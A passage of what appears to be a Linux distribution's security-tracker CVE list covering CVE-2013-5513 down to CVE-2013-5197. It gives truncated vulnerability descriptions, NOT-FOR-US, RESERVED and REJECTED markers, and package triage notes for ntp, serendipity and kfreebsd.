RESERVED CVE-2013-5513 (Cisco Adaptive Security Appliance (ASA) Software 8.2.x before 8.2(5.46 ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-5512 (Race condition in the HTTP Deep Packet Inspection (DPI) feature in Cis ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-5511 (The Adaptive Security Device Management (ASDM) remote-management featu ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-5510 (The remote-access VPN implementation in Cisco Adaptive Security Applia ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-5509 (The SSL implementation in Cisco Adaptive Security Appliance (ASA) Soft ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-5508 (The SQL*Net inspection engine in Cisco Adaptive Security Appliance (AS ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-5507 (The IPsec implementation in Cisco Adaptive Security Appliance (ASA) So ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-5506 (The authorization functionality in Cisco Firewall Services Module (FWS ...) NOT-FOR-US: Cisco Firewall Services Module CVE-2013-5505 (Cross-site scripting (XSS) vulnerability in an administration page in ...) NOT-FOR-US: Cisco CVE-2013-5504 (Cross-site scripting (XSS) vulnerability in the Mobile Device Manageme ...) NOT-FOR-US: Cisco CVE-2013-5503 (The UDP process in Cisco IOS XR 4.3.1 does not free packet memory upon ...) NOT-FOR-US: Cisco CVE-2013-5502 (The web interface in Cisco MediaSense does not properly protect the cl ...) NOT-FOR-US: Cisco MediaSense CVE-2013-5501 (Cross-site scripting (XSS) vulnerability in the oraservice page in Cis ...) NOT-FOR-US: Cisco MediaSense CVE-2013-5500 (Multiple cross-site scripting (XSS) vulnerabilities in the oraadmin se ...) NOT-FOR-US: Cisco MediaSense CVE-2013-5499 (The remember feature in the DHCP server in Cisco IOS allows remote att ...) NOT-FOR-US: Cisco CVE-2013-5498 (The PPTP-ALG component in CRS Carrier Grade Services Engine (CGSE) and ...) NOT-FOR-US: Cisco IOS XR CVE-2013-5497 (The authentication manager process in the web framework in Cisco Intru ...) NOT-FOR-US: Cisco Intrusion Prevention System CVE-2013-5496 (Open Network Environment Platform (ONEP) in Cisco NX-OS allows remote ...) NOT-FOR-US: Cisco NX-OS CVE-2013-5495 (Cross-site scripting (XSS) vulnerability in the web framework in the A ...) NOT-FOR-US: Cisco Unified MeetingPlace CVE-2013-5494 (Cross-site request forgery (CSRF) vulnerability in the web framework i ...) NOT-FOR-US: Cisco Unified MeetingPlace CVE-2013-5493 (The diagnostic module in the firmware on Cisco Virtualization Experien ...) NOT-FOR-US: Cisco CVE-2013-5492 (administration.jsp in Cisco SocialMiner allows remote attackers to obt ...) NOT-FOR-US: Cisco CVE-2013-5491 RESERVED CVE-2013-5490 (Cisco Prime Data Center Network Manager (DCNM) before 6.2(1) allows re ...) NOT-FOR-US: Cisco Prime Data Center Network Manager CVE-2013-5489 (The gadget implementation in Cisco SocialMiner does not properly restr ...) NOT-FOR-US: Cisco CVE-2013-5488 (Cisco Common Services, as used in Cisco Prime LAN Management Solution ...) NOT-FOR-US: Cisco CVE-2013-5487 (DCNM-SAN Server in Cisco Prime Data Center Network Manager (DCNM) befo ...) NOT-FOR-US: Cisco Prime Data Center Network Manager CVE-2013-5486 (Directory traversal vulnerability in processImageSave.jsp in DCNM-SAN ...) NOT-FOR-US: Cisco Prime Data Center Network Manager CVE-2013-5485 RESERVED CVE-2013-5484 RESERVED CVE-2013-5483 (Cross-site scripting (XSS) vulnerability in bookmarklet.jsp in Cisco S ...) NOT-FOR-US: Cisco CVE-2013-5482 (Cisco Prime LAN Management Solution (LMS) does not properly restrict u ...) NOT-FOR-US: Cisco CVE-2013-5481 (The PPTP implementation in Cisco IOS 12.2 and 15.0 through 15.3, when ...) NOT-FOR-US: Cisco IOS CVE-2013-5480 (The DNS-over-TCP implementation in Cisco IOS 12.2 and 15.0 through 15. ...) NOT-FOR-US: Cisco IOS CVE-2013-5479 (The DNS-over-TCP implementation in Cisco IOS 12.2 and 15.0 through 15. ...) NOT-FOR-US: Cisco IOS CVE-2013-5478 (Cisco IOS 15.0 through 15.3 and IOS XE 3.2 through 3.8, when a VRF int ...) NOT-FOR-US: Cisco IOS CVE-2013-5477 (The T1/E1 driver-queue functionality in Cisco IOS 12.2 and 15.0 throug ...) NOT-FOR-US: Cisco IOS CVE-2013-5476 (The Zone-Based Firewall (ZFW) feature in Cisco IOS 15.1 through 15.2, ...) NOT-FOR-US: Cisco IOS CVE-2013-5475 (Cisco IOS 12.2 through 12.4 and 15.0 through 15.3, and IOS XE 2.1 thro ...) NOT-FOR-US: Cisco IOS CVE-2013-5474 (Race condition in the IPv6 virtual fragmentation reassembly (VFR) impl ...) NOT-FOR-US: Cisco IOS CVE-2013-5473 (Memory leak in Cisco IOS 12.2, 15.1, and 15.2; IOS XE 3.4.2S through 3 ...) NOT-FOR-US: Cisco IOS CVE-2013-5472 (The NTP implementation in Cisco IOS 12.0 through 12.4 and 15.0 through ...) NOT-FOR-US: Cisco IOS CVE-2013-5471 (Cross-site request forgery (CSRF) vulnerability in the web framework i ...) NOT-FOR-US: Cisco Global Site Selector CVE-2013-5470 (Cisco Secure Access Control System (ACS) does not properly handle requ ...) NOT-FOR-US: Cisco Secure Access Control System CVE-2013-5469 (The TCP implementation in Cisco IOS does not properly implement the tr ...) NOT-FOR-US: Cisco IOS CVE-2013-5468 (IBM Algo One, as used in MetaData Management Tools in UDS 4.7.0 throug ...) NOT-FOR-US: IBM Algo One CVE-2013-5467 (Monitoring Agent for UNIX Logs 6.2.0 through FP03, 6.2.1 through FP04, ...) NOT-FOR-US: IBM Tivoli Monitoring CVE-2013-5466 (The XSLT library in IBM DB2 and DB2 Connect 9.5 through 10.5, and the ...) NOT-FOR-US: IBM DB2 and DB2 Connect CVE-2013-5465 (IBM Maximo Asset Management 7.x before 7.1.1.7 LAFIX.20140319-0837, 7. ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-5464 (IBM Maximo Asset Management 7.5.x before 7.5.0.3 IFIX027, 7.5.0.4 befo ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-5463 (The WinCollect agent in IBM Security QRadar SIEM before 7.1.1.569824 a ...) NOT-FOR-US: IBM Security QRadar SIEM CVE-2013-5462 (IBM/ECMClient/configure/explodedformat/navigator/header.jsp in IBM Con ...) NOT-FOR-US: IBM CVE-2013-5461 (IBM Endpoint Manager for Remote Control 9.0.0 and 9.0.1 and Tivoli Rem ...) NOT-FOR-US: IBM CVE-2013-5460 (IBM Maximo Asset Management 7.x before 7.5.0.6 and SmartCloud Control ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-5459 (Unspecified vulnerability in IBM Rational Software Architect (RSA) Des ...) NOT-FOR-US: IBM CVE-2013-5458 (Unspecified vulnerability in IBM Java SDK 7.0.0 before SR6 allows remo ...) NOT-FOR-US: IBM JDK CVE-2013-5457 (Unspecified vulnerability in IBM Java SDK 7.0.0 before SR6, 6.0.1 befo ...) NOT-FOR-US: IBM JDK CVE-2013-5456 (The com.ibm.rmi.io.SunSerializableFactory class in IBM Java SDK 7.0.0 ...) NOT-FOR-US: IBM JDK CVE-2013-5455 (IBM SmartCloud Provisioning 2.1 before FP3 IF0001 allows remote authen ...) NOT-FOR-US: IBM SmartCloud Provisioning CVE-2013-5454 (IBM WebSphere Portal 6.0 through 6.0.1.7, 6.1.0 through 6.1.0.6 CF27, ...) NOT-FOR-US: IBM WebSphere CVE-2013-5453 (IBM Security AppScan Enterprise 5.6 through 8.7.0.1 allows remote auth ...) NOT-FOR-US: IBM CVE-2013-5452 (IBM FileNet Business Process Framework 4.1.0 allows remote authenticat ...) NOT-FOR-US: IBM FileNet Business Process Framework CVE-2013-5451 RESERVED CVE-2013-5450 (IBM Security AppScan Enterprise 8.5 through 8.7.0.1, when Jazz authent ...) NOT-FOR-US: IBM CVE-2013-5449 (Cross-site scripting (XSS) vulnerability in workingSet.jsp in IBM Ecli ...) NOT-FOR-US: IBM CVE-2013-5448 (Cross-site scripting (XSS) vulnerability in the Right Click Plugin con ...) NOT-FOR-US: IBM Security QRadar SIEM CVE-2013-5447 (Stack-based buffer overflow in IBM Forms Viewer 4.x before 4.0.0.3 and ...) NOT-FOR-US: IBM Forms Viewer CVE-2013-5446 (The console on IBM WebSphere DataPower XC10 appliances 2.1.0 and 2.5.0 ...) NOT-FOR-US: IBM WebSphere DataPower XC10 appliances CVE-2013-5445 (IBM Cognos Express 9.0 before IFIX 2, 9.5 before IFIX 2, 10.1 before I ...) NOT-FOR-US: IBM Cognos CVE-2013-5444 (The server in IBM Cognos Express 9.0 before IFIX 2, 9.5 before IFIX 2, ...) NOT-FOR-US: IBM Cognos CVE-2013-5443 (Cross-site request forgery (CSRF) vulnerability in IBM Cognos Express ...) NOT-FOR-US: IBM Cognos CVE-2013-5442 (Cross-site scripting (XSS) vulnerability in the Local Management Inter ...) NOT-FOR-US: IBM CVE-2013-5441 RESERVED CVE-2013-5440 (IBM InfoSphere Information Server 8.0, 8.1, 8.5, 8.7, and 9.1 allows l ...) NOT-FOR-US: IBM InfoSphere Information Server CVE-2013-5439 RESERVED CVE-2013-5438 (Cross-site scripting (XSS) vulnerability in the web server in IBM Flex ...) NOT-FOR-US: IBM Flex System Manager CVE-2013-5437 RESERVED CVE-2013-5436 RESERVED CVE-2013-5435 RESERVED CVE-2013-5434 RESERVED CVE-2013-5433 (The Data Growth Solution for JD Edwards EnterpriseOne in IBM InfoSpher ...) NOT-FOR-US: IBM CVE-2013-5432 RESERVED CVE-2013-5431 (Open redirect vulnerability in IBM Tivoli Federated Identity Manager ( ...) NOT-FOR-US: IBM Tivoli Federated Identity Manager CVE-2013-5430 (The Jazz Team Server component in IBM Security AppScan Enterprise 8.x ...) NOT-FOR-US: IBM Security AppScan Enterprise CVE-2013-5429 (The Risk Based Access functionality in IBM Tivoli Federated Identity M ...) NOT-FOR-US: IBM Tivoli Federated Identity Manager CVE-2013-5428 (IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentic ...) NOT-FOR-US: IBM WebSphere DataPower XC10 appliances CVE-2013-5427 (Cross-site request forgery (CSRF) vulnerability in IBM InfoSphere Mast ...) NOT-FOR-US: IBM InfoSphere Master Data Management CVE-2013-5426 (Session fixation vulnerability in IBM InfoSphere Master Data Managemen ...) NOT-FOR-US: IBM CVE-2013-5425 (Cross-site scripting (XSS) vulnerability in the Administration Console ...) NOT-FOR-US: IBM WebSphere CVE-2013-5424 (IBM Flex System Manager (FSM) 1.3.0 allows remote attackers to bypass ...) NOT-FOR-US: IBM Flex System Manager CVE-2013-5423 (IBM Flex System Manager (FSM) 1.1 through 1.3 before 1.3.2.0 allows re ...) NOT-FOR-US: IBM Flex System Manager CVE-2013-5422 (The Web Client in IBM Rational ClearQuest 7.1 through 7.1.2.12, 8.0.0. ...) NOT-FOR-US: IBM Rational ClearQuest CVE-2013-5421 (Cross-site scripting (XSS) vulnerability in the IMS server before Ifix ...) NOT-FOR-US: IBM CVE-2013-5420 (The IMS server before Ifix 6 in IBM Security Access Manager for Enterp ...) NOT-FOR-US: IBM Security Access Manager CVE-2013-5419 (Multiple buffer overflows in (1) mkque and (2) mkquedev in bos.rte.pri ...) NOT-FOR-US: IBM AIX CVE-2013-5418 (Cross-site scripting (XSS) vulnerability in the Administrative console ...) NOT-FOR-US: IBM WebSphere CVE-2013-5417 (Cross-site scripting (XSS) vulnerability in IBM WebSphere Application ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2013-5416 (Unspecified vulnerability in IBM Rational ClearCase through 7.1.2.12, ...) NOT-FOR-US: IBM Rational ClearCase CVE-2013-5415 (Buffer overflow in IBM Rational ClearCase through 7.1.2.12, 8.0.0.x be ...) NOT-FOR-US: IBM Rational ClearCase CVE-2013-5414 (The migration functionality in IBM WebSphere Application Server (WAS) ...) NOT-FOR-US: IBM WebSphere Application Server CVE-2013-5413 (IBM Sterling B2B Integrator 5.2 and Sterling File Gateway 2.2 do not i ...) NOT-FOR-US: IBM CVE-2013-5412 RESERVED CVE-2013-5411 (IBM Sterling B2B Integrator 5.2 and Sterling File Gateway 2.2 allow re ...) NOT-FOR-US: IBM CVE-2013-5410 RESERVED CVE-2013-5409 (Multiple SQL injection vulnerabilities in IBM Sterling B2B Integrator ...) NOT-FOR-US: IBM CVE-2013-5408 RESERVED CVE-2013-5407 (IBM Sterling B2B Integrator 5.2 and Sterling File Gateway 2.2 do not p ...) NOT-FOR-US: IBM CVE-2013-5406 (Multiple cross-site scripting (XSS) vulnerabilities in IBM Sterling B2 ...) NOT-FOR-US: IBM CVE-2013-5405 (Multiple cross-site scripting (XSS) vulnerabilities in IBM Sterling B2 ...) NOT-FOR-US: IBM CVE-2013-5404 (Cross-site scripting (XSS) vulnerability in the search implementation ...) NOT-FOR-US: IBM Rational Quality Manager CVE-2013-5403 (Unspecified vulnerability on the IBM WebSphere DataPower XC10 applianc ...) NOT-FOR-US: IBM WebSphere CVE-2013-5402 (Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Managemen ...) NOT-FOR-US: IBM CVE-2013-5401 (The command-port listener in IBM WebSphere MQ Internet Pass-Thru (MQIP ...) NOT-FOR-US: IBM WebSphere MQ CVE-2013-5400 (An unspecified servlet in IBM Platform Symphony Developer Edition (DE) ...) NOT-FOR-US: IBM Platform Symphony Developer Edition CVE-2013-5399 RESERVED CVE-2013-5398 (Unspecified vulnerability in the Webservice Axis Gateway in IBM Ration ...) NOT-FOR-US: IBM CVE-2013-5397 (Unspecified vulnerability in the Webservice Axis Gateway in IBM Ration ...) NOT-FOR-US: IBM CVE-2013-5396 RESERVED CVE-2013-5395 (IBM Maximo Asset Management 6.2 through 6.2.8, 7.1 before 7.1.1.12, an ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-5394 (The monitoring console in IBM WebSphere eXtreme Scale 7.1.0, 7.1.1, 8. ...) NOT-FOR-US: IBM WebSphere eXtreme Scale CVE-2013-5393 (The monitoring console in IBM WebSphere eXtreme Scale 7.1.0, 7.1.1, 8. ...) NOT-FOR-US: IBM WebSphere eXtreme Scale CVE-2013-5392 RESERVED CVE-2013-5391 (IBM Worklight Consumer and Enterprise Editions 5.0.x before 5.0.6 Fix ...) NOT-FOR-US: IBM CVE-2013-5390 (Cross-site scripting (XSS) vulnerability in the monitoring console in ...) NOT-FOR-US: IBM WebSphere eXtreme Scale CVE-2013-5389 (Cross-site scripting (XSS) vulnerability in iNotes in IBM Domino 8.5.3 ...) NOT-FOR-US: IBM Domino CVE-2013-5388 (Cross-site scripting (XSS) vulnerability in iNotes in IBM Domino 8.5.3 ...) NOT-FOR-US: IBM Domino CVE-2013-5387 (Buffer overflow in IBM Platform Symphony 5.2, 6.1, and 6.1.1 allows re ...) NOT-FOR-US: IBM CVE-2013-5386 RESERVED CVE-2013-5385 (The OSPF implementation in IBM i 6.1 and 7.1, in z/OS on zSeries serve ...) NOT-FOR-US: IBM CVE-2013-5384 RESERVED CVE-2013-5383 (IBM Maximo Asset Management 6.2 through 6.2.8, 7.1 before 7.1.1.12, an ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-5382 (IBM Maximo Asset Management 6.2 through 6.2.8, 7.1 before 7.1.1.12, an ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-5381 (IBM Maximo Asset Management 6.2 through 6.2.8, 7.1 through 7.1.1.12, a ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-5380 (IBM Maximo Asset Management 6.2 through 6.2.8, 7.1 before 7.1.1.12, an ...) NOT-FOR-US: IBM Maximo Asset Management CVE-2013-5379 (Cross-site scripting (XSS) vulnerability in IBM WebSphere Portal 7.x b ...) NOT-FOR-US: IBM WebSphere Portal CVE-2013-5378 (Cross-site scripting (XSS) vulnerability in IBM WebSphere Portal 8.x b ...) NOT-FOR-US: IBM WebSphere Portal CVE-2013-5377 RESERVED CVE-2013-5376 (Cross-site scripting (XSS) vulnerability in IBM Storwize V7000 Unified ...) NOT-FOR-US: IBM Storwize V7000 Unified CVE-2013-5375 (Unspecified vulnerability in IBM Java SDK 7.0.0 before SR6, 6.0.1 befo ...) NOT-FOR-US: IBM JDK CVE-2013-5374 RESERVED CVE-2013-5373 (The RemoteClient component in IBM Rational ClearCase 8.0.0.03 through ...) NOT-FOR-US: IBM Rational ClearCase CVE-2013-5372 (The XML4J parser in IBM WebSphere Message Broker 6.1 before 6.1.0.12, ...) NOT-FOR-US: IBM CVE-2013-5371 (The client in IBM Tivoli Storage Manager (TSM) 6.3.1 and 6.4.0 on Wind ...) NOT-FOR-US: IBM Tivoli Storage Manager CVE-2013-5370 (Unspecified vulnerability in IBM SPSS Collaboration and Deployment Ser ...) NOT-FOR-US: IBM SPSS Collaboration and Deployment Services CVE-2013-5369 (IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1 ...) NOT-FOR-US: IBM SPSS Analytical Decision Management CVE-2013-5368 RESERVED CVE-2013-5367 RESERVED CVE-2013-5366 RESERVED CVE-2013-5365 (Heap-based buffer overflow in Autodesk SketchBook for Enterprise 2014, ...) NOT-FOR-US: Autodesk SketchBook CVE-2013-5364 (Secunia CSI Agent 6.0.0.15017 and earlier, 6.0.1.1007 and earlier, and ...) NOT-FOR-US: Secunia CSI Agent CVE-2013-5363 RESERVED CVE-2013-5362 RESERVED CVE-2013-5361 RESERVED CVE-2013-5360 RESERVED CVE-2013-5359 (Stack-based buffer overflow in Picasa3.exe in Google Picasa before 3.9 ...) NOT-FOR-US: Google Picasa CVE-2013-5358 (Picasa3.exe in Google Picasa before 3.9.0 Build 137.69 allows remote a ...) NOT-FOR-US: Google Picasa CVE-2013-5357 (Integer overflow in Picasa3.exe in Google Picasa before 3.9.0 Build 13 ...) NOT-FOR-US: Google Picasa CVE-2013-5356 (Sharetronix 3.1.1.3, 3.1.1, and earlier does not properly restrict acc ...) NOT-FOR-US: Sharetronix CVE-2013-5355 (Multiple cross-site request forgery (CSRF) vulnerabilities in Sharetro ...) NOT-FOR-US: Sharetronix CVE-2013-5354 (Multiple SQL injection vulnerabilities in Sharetronix 3.1.1 allow remo ...) NOT-FOR-US: Sharetronix CVE-2013-5353 (Unrestricted file upload vulnerability in system/controllers/ajax/atta ...) NOT-FOR-US: Sharetronix CVE-2013-5352 (Sharetronix 3.1.1.3, 3.1.1, and earlier allows remote attackers to exe ...) NOT-FOR-US: Sharetronix CVE-2013-5351 (Heap-based buffer overflow in IrfanView before 4.37 allows remote atta ...) NOT-FOR-US: IrfanView CVE-2013-5350 (The "Remember me" feature in the opSecurityUser::getRememberLoginCooki ...) NOT-FOR-US: OpenPNE CVE-2013-5349 (Integer underflow in Picasa3.exe in Google Picasa before 3.9.0 Build 1 ...) NOT-FOR-US: Google Picasa CVE-2013-5348 REJECTED CVE-2013-5347 REJECTED CVE-2013-5346 REJECTED CVE-2013-5345 REJECTED CVE-2013-5344 REJECTED CVE-2013-5343 REJECTED CVE-2013-5342 REJECTED CVE-2013-5341 REJECTED CVE-2013-5340 REJECTED CVE-2013-5339 REJECTED CVE-2013-5338 REJECTED CVE-2013-5337 REJECTED CVE-2013-5336 REJECTED CVE-2013-5335 REJECTED CVE-2013-5334 (Adobe Shockwave Player before 12.0.7.148 allows attackers to execute a ...) NOT-FOR-US: Adobe Shockwave Player CVE-2013-5333 (Adobe Shockwave Player before 12.0.7.148 allows attackers to execute a ...) NOT-FOR-US: Adobe Shockwave Player CVE-2013-5332 (Adobe Flash Player before 11.7.700.257 and 11.8.x and 11.9.x before 11 ...) NOT-FOR-US: Adobe Flash Player CVE-2013-5331 (Adobe Flash Player before 11.7.700.257 and 11.8.x and 11.9.x before 11 ...) NOT-FOR-US: Adobe Flash Player CVE-2013-5330 (Adobe Flash Player before 11.7.700.252 and 11.8.x and 11.9.x before 11 ...) NOT-FOR-US: Adobe Flash Player CVE-2013-5329 (Adobe Flash Player before 11.7.700.252 and 11.8.x and 11.9.x before 11 ...) NOT-FOR-US: Adobe Flash Player CVE-2013-5328 (Adobe ColdFusion 10 before Update 12 allows remote attackers to read a ...) NOT-FOR-US: Adobe ColdFusion CVE-2013-5327 (MDBMS.dll in Adobe RoboHelp 10 allows attackers to execute arbitrary c ...) NOT-FOR-US: Adobe RoboHelp CVE-2013-5326 (Cross-site scripting (XSS) vulnerability in Adobe ColdFusion 9.0 befor ...) NOT-FOR-US: Adobe ColdFusion CVE-2013-5325 (Adobe Reader and Acrobat 11.x before 11.0.05 on Windows allow remote a ...) NOT-FOR-US: Adobe CVE-2013-5324 (Adobe Flash Player before 11.7.700.242 and 11.8.x before 11.8.800.168 ...) NOT-FOR-US: Adobe Flash Player CVE-2013-5323 (Cross-site scripting (XSS) vulnerability in the Static Info Tables (st ...) NOT-FOR-US: TYPO3 extension (Static Info Tables) CVE-2013-5322 (SQL injection vulnerability in the CoolURI extension before 1.0.30 for ...) NOT-FOR-US: TYPO3 extension (CoolURI) CVE-2013-5321 (Multiple SQL injection vulnerabilities in AlienVault Open Source Secur ...) NOT-FOR-US: AlienVault Open Source Security Information Management CVE-2013-5320 (Cross-site scripting (XSS) vulnerability in Forums/EditPost.aspx in mo ...) NOT-FOR-US: mojoPortal CVE-2013-5319 (Cross-site scripting (XSS) vulnerability in secure/admin/user/views/de ...) NOT-FOR-US: Atlassian JIRA CVE-2013-5318 (SQL injection vulnerability in Ginkgo CMS 5.0 allows remote attackers ...) NOT-FOR-US: Ginkgo CMS CVE-2013-5317 (Cross-site scripting (XSS) vulnerability in RiteCMS 1.0.0 allows remot ...) NOT-FOR-US: RiteCMS CVE-2013-5316 (Cross-site request forgery (CSRF) vulnerability in RiteCMS 1.0.0 allow ...) NOT-FOR-US: RiteCMS CVE-2013-5313 (Cross-site request forgery (CSRF) vulnerability in core/admin/modules/ ...) NOT-FOR-US: BigTree CMS CVE-2013-5312 (Multiple cross-site scripting (XSS) vulnerabilities in Vastal I-Tech p ...) NOT-FOR-US: Vastal I-Tech phpVID CVE-2013-5311 (Multiple SQL injection vulnerabilities in Vastal I-Tech phpVID 1.2.3 a ...) NOT-FOR-US: Vastal I-Tech phpVID CVE-2013-5315 (Cross-site scripting (XSS) vulnerability in the Resource Manager in th ...) NOT-FOR-US: Drupal module CVE-2013-5314 (Cross-site scripting (XSS) vulnerability in serendipity_admin_image_se ...) - serendipity [squeeze] - serendipity (Unsupported in squeeze-lts) CVE-2013-5310 (SQL injection vulnerability in the DB Integration (wfqbe) extension be ...) NOT-FOR-US: TYPO3 extension CVE-2013-5309 (Cross-site scripting (XSS) vulnerability in install/forum_data/src/cus ...) NOT-FOR-US: FUDforum CVE-2013-5308 (Cross-site scripting (XSS) vulnerability in the RealURL Management (re ...) NOT-FOR-US: TYPO3 extension CVE-2013-5307 (Cross-site scripting (XSS) vulnerability in the Faceted Search (ke_sea ...) NOT-FOR-US: Faceted Search TYPO3 extension CVE-2013-5306 (SQL injection vulnerability in the Browser - TYPO3 without PHP (browse ...) NOT-FOR-US: TYPO3 Extension CVE-2013-5305 (Cross-site scripting (XSS) vulnerability in the Store Locator (locator ...) NOT-FOR-US: typo3 third party component (locator) CVE-2013-5304 (SQL injection vulnerability in the Store Locator (locator) extension b ...) NOT-FOR-US: typo3 third party component (locator) CVE-2013-5303 (Unspecified vulnerability in the Store Locator (locator) extension bef ...) NOT-FOR-US: typo3 third party component (locator) CVE-2013-5302 (SQL injection vulnerability in the Faceted Search (ke_search) extensio ...) NOT-FOR-US: Faceted Search TYPO3 extension CVE-2013-5301 (Directory traversal vulnerability in help.php in Trustport Webfilter 5 ...) NOT-FOR-US: Trustport Webfilter CVE-2013-5300 (Multiple cross-site scripting (XSS) vulnerabilities in AlienVault Open ...) NOT-FOR-US: AlienVault OSSIM CVE-2013-5299 RESERVED CVE-2013-5298 RESERVED CVE-2013-5297 RESERVED CVE-2013-5296 RESERVED CVE-2013-5295 RESERVED CVE-2013-5294 RESERVED CVE-2013-5293 RESERVED CVE-2013-5292 RESERVED CVE-2013-5291 RESERVED CVE-2013-5290 RESERVED CVE-2013-5289 RESERVED CVE-2013-5288 RESERVED CVE-2013-5287 RESERVED CVE-2013-5286 RESERVED CVE-2013-5285 RESERVED CVE-2013-5284 RESERVED CVE-2013-5283 RESERVED CVE-2013-5282 RESERVED CVE-2013-5281 RESERVED CVE-2013-5280 RESERVED CVE-2013-5279 RESERVED CVE-2013-5278 RESERVED CVE-2013-5277 RESERVED CVE-2013-5276 RESERVED CVE-2013-5275 RESERVED CVE-2013-5274 RESERVED CVE-2013-5273 RESERVED CVE-2013-5272 RESERVED CVE-2013-5271 RESERVED CVE-2013-5270 RESERVED CVE-2013-5269 RESERVED CVE-2013-5268 RESERVED CVE-2013-5267 RESERVED CVE-2013-5266 RESERVED CVE-2013-5265 RESERVED CVE-2013-5264 RESERVED CVE-2013-5263 RESERVED CVE-2013-5262 RESERVED CVE-2013-5261 RESERVED CVE-2013-5260 RESERVED CVE-2013-5259 RESERVED CVE-2013-5258 RESERVED CVE-2013-5257 RESERVED CVE-2013-5256 RESERVED CVE-2013-5255 RESERVED CVE-2013-5254 RESERVED CVE-2013-5253 RESERVED CVE-2013-5252 RESERVED CVE-2013-5251 RESERVED CVE-2013-5250 RESERVED CVE-2013-5249 RESERVED CVE-2013-5248 RESERVED CVE-2013-5247 RESERVED CVE-2013-5246 RESERVED CVE-2013-5245 RESERVED CVE-2013-5244 RESERVED CVE-2013-5243 RESERVED CVE-2013-5242 RESERVED CVE-2013-5241 RESERVED CVE-2013-5240 RESERVED CVE-2013-5239 RESERVED CVE-2013-5238 RESERVED CVE-2013-5237 RESERVED CVE-2013-5236 RESERVED CVE-2013-5235 RESERVED CVE-2013-5234 RESERVED CVE-2013-5233 RESERVED CVE-2013-5232 RESERVED CVE-2013-5231 RESERVED CVE-2013-5230 RESERVED CVE-2013-5229 (The Remote Desktop full-screen feature in Apple OS X before 10.9 and A ...) NOT-FOR-US: Apple CVE-2013-5228 (WebKit, as used in Apple Safari before 6.1.1 and 7.x before 7.0.1, all ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-5227 (Apple Safari before 6.1.1 and 7.x before 7.0.1 allows remote attackers ...) NOT-FOR-US: Safari CVE-2013-5226 RESERVED CVE-2013-5225 (WebKit, as used in Apple Safari before 6.1.1 and 7.x before 7.0.1, all ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-5224 RESERVED CVE-2013-5223 (Multiple cross-site scripting (XSS) vulnerabilities in D-Link DSL-2760 ...) NOT-FOR-US: D-Link DSL-2760U Gateway CVE-2013-5222 (Multiple cross-site scripting (XSS) vulnerabilities in ESRI ArcGIS for ...) NOT-FOR-US: ESRI ArcGIS CVE-2013-5221 (The mobile-upload feature in Esri ArcGIS for Server 10.1 through 10.2 ...) NOT-FOR-US: Esri ArcGIS CVE-2013-5220 (goform/login on the HOT HOTBOX router with software 2.1.11 allows remo ...) NOT-FOR-US: HOT HOTBOX router CVE-2013-5219 (Directory traversal vulnerability on the HOT HOTBOX router with softwa ...) NOT-FOR-US: HOT HOTBOX router CVE-2013-5218 (Cross-site scripting (XSS) vulnerability on the HOT HOTBOX router with ...) NOT-FOR-US: HOT HOTBOX router CVE-2013-5216 (Directory traversal vulnerability in logreader/uploadreader.jsp in Cap ...) NOT-FOR-US: Performance Guard CVE-2013-5215 (Cross-site scripting (XSS) vulnerability in the web interface "WiFi sc ...) NOT-FOR-US: FOSCAM Wireless IP Camera CVE-2013-5214 RESERVED CVE-2013-5213 RESERVED CVE-2013-5212 (Cross-site Scripting (XSS) in EasyXDM before 2.4.18 allows remote atta ...) NOT-FOR-US: easyXDM CVE-2013-5211 (The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 al ...) - ntp 1:4.2.8p3+dfsg-1 (low; bug #733940) [jessie] - ntp (No backportable code fix exists, default configuration is safe, tiny subsection of affected users can run a backport) [wheezy] - ntp (No backportable code fix exists, default configuration is safe, tiny subsection of affected users can run a backport) [squeeze] - ntp (No backportable code fix exists, default configuration is safe, tiny subsection of affected users can run a backport) NOTE: http://bugs.ntp.org/show_bug.cgi?id=1532 NOTE: mitigated if noquery used. Only a problem for (public) ntp servers allowing NOTE: querying ntpd status, so allowing monlist CVE-2013-5210 (Cross-site scripting (XSS) vulnerability in the GUI login page in ADTR ...) NOT-FOR-US: Adtran Netvanta CVE-2013-5209 (The sctp_send_initiate_ack function in sys/netinet/sctp_output.c in th ...) {DSA-2743-1} - kfreebsd-8 (bug #720476) [wheezy] - kfreebsd-8 8.3-6+deb7u1 [squeeze] - kfreebsd-8 (Unsupported in squeeze-lts) - kfreebsd-9 9.2~svn254368-2 (bug #720475) - kfreebsd-10 10.0~svn254663-1 (bug #720478) CVE-2013-5208 (HR Systems Strategies info:HR HRIS 7.9 does not properly protect the d ...) NOT-FOR-US: HR Systems Strategies CVE-2013-5207 RESERVED CVE-2013-5206 RESERVED CVE-2013-5205 RESERVED CVE-2013-5204 RESERVED CVE-2013-5203 RESERVED CVE-2013-5202 RESERVED CVE-2013-5201 RESERVED CVE-2013-5200 (The (1) REST and (2) memcache interfaces in the Hazelcast cluster API ...) NOT-FOR-US: Open-Xchange CVE-2013-5199 (WebKit, as used in Apple Safari before 6.1.1 and 7.x before 7.0.1, all ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-5198 (WebKit, as used in Apple Safari before 6.1.1 and 7.x before 7.0.1, all ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-5197 (WebKit, as used in Apple Safari before 6.1.1 and 7.x before 7.0.1, all ...) 